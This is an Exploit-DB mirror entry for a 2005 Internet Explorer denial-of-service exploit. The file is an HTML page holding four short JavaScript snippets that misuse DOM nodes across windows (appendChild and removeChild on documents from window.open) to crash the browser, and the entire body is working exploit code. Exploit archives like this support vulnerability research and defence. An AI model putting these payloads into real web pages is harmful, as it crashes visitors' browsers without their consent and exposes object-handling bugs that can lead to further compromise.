exploit-db-mirror/exploits/windows/dos/931.html
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
672 B
HTML

<!-- Here are multiple Microsoft Internet Explorer DHTML Object Handling Vulnerabilities by Skylined /str0ke -->
<SCRIPT language="javascript">
a=document.createTextNode();try{window.open().document.appendChild(a);}catch(e){}document.removeChild(a);
</SCRIPT>
<SCRIPT language="javascript">
p=document.createElement();c=window.open().document.createElement();try{c.appendChild(p);}catch(e){p.removeChild(c);};
</SCRIPT>
<SCRIPT language="javascript">
try{window.open().document.appendChild(document);}catch(e){}
</SCRIPT>
<SCRIPT>
try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT>
# milw0rm.com [2005-04-12]